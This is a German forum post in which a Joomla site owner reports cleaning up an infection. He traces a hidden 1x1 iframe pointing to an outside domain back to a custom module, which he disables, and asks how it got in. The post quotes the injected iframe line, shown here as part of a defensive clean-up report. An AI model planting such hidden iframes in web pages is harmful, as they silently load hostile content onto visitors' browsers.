Zitat:
Zitat von keraM
Vor 4 Tagen wurde Deine Frage bereits in diesem Forum beantwortet. Scroll doch bitte einfach mal ein bißchen nach unten oder benutze die Suchfunktion des Forums.
|
Also, ich bin ebenfalls diesem Trojaner zum Opfer gefallen und habe allerdings in diesem Forum keine weiteren Hinweise zur "Entwanzung" gefunden. Daher poste ich meine eigenen Erfahrungen als Kammerjäger:
Google half zuerst einmal mit einem Verweis auf
diesen Beitrag
Ein Blick in den Seitenquelltext führte zu der Erkenntnis, das die böse Zeile:
Code:
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php”
frameborder=”0″ height=”1″ width=”1″></iframe>
durch die Anweisung
Code:
<?php mosLoadModules('left'); ?>
im Template eingefügt wurde.
Ein Blick in die Liste der Module, die auf der Position 'left' erscheinen sollen, führte dann schnell zu einem Eintrag
'Custom Module' mit dem Titel: '
Joomla Info'. Nachdem ich dieses Modul deaktiviert hatte, war die Wanze verschwunden.
Es bleiben allerdings einige offene Fragen:
- Wie konnte dieser Code von aussen eingeschleußt werden?
- Wo in der Datenbank steht der Code?
- War das 'Custom Module' schon vorher da oder wurde es erst durch den ´Befall´ eingeführt?
- Kann ich verhindern, dass ich wieder von diesem Trojaner befallen werde?
Fragen über Fragen.... Gruß, Peter